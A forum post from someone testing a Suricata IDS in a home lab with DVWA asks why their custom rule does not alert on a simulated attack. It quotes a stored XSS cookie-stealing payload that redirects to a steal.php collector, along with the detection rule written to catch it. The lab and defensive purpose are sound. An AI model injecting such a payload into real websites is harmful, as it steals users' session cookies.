Good day everyone,
My suricata is currently installed in my azure Kali linux vm and inside the vm is a website which is ( GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)). I have a second attacker Kali linux vm which accesses the website and injects this script to simulate an attack in a comment box.
<script>document.location='127.0.0.1/steal.php?cookie='+document.cookie;<script>
My Suricata is configured to my VM’s eth0 IP since the website is local host and the stream: checksum validation is off because its generating an error in my fast.log file before. I can see the website traffic in the eve.json file and I can see that no packets are being lost in the stat.log, but its not alerting me. I have this one rule configured to catch that one specific attack but its not working
alert http any any → $HOME_NET any (msg:“Attempted cookie theft using JavaScript”; content:“document.location=”; nocase; http_client_body; content:“steal.php?cookie=”; nocase; http_client_body; content:“document.cookie”; nocase; http_client_body; classtype:web-application-attack; sid:1999991; rev:1;)
What is wrong with my rule or system?